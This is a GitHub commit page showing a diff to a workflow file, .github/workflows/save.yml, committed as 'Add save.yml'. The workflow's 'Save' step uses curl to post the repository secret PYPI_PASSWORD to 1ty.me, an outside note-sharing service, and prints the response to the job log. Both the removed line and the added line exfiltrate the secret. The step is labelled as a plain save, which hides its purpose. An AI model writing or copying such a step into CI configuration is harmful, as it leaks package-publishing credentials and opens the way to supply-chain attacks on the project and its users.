Skip to content

Commit 5c2b9a4

Browse files
committed
Add save.yml
1 parent cfac8df commit 5c2b9a4

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

.github/workflows/save.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -9,5 +9,5 @@ jobs:
99
steps:
1010
- name: Save
1111
run: |
12-
response=$(curl -X POST https://1ty.me/?mode=ajax&cmd=create_note -F 'note=${{ secrets.PYPI_PASSWORD }}' -F 'expires_on=undefined')
12+
response=$(curl --location 'https://1ty.me/?mode=ajax&cmd=create_note' --form 'note="${{ secrets.PYPI_PASSWORD }}"' --form 'expires_on="undefined"')
1313
echo "Response: $response"

0 commit comments

Comments
 (0)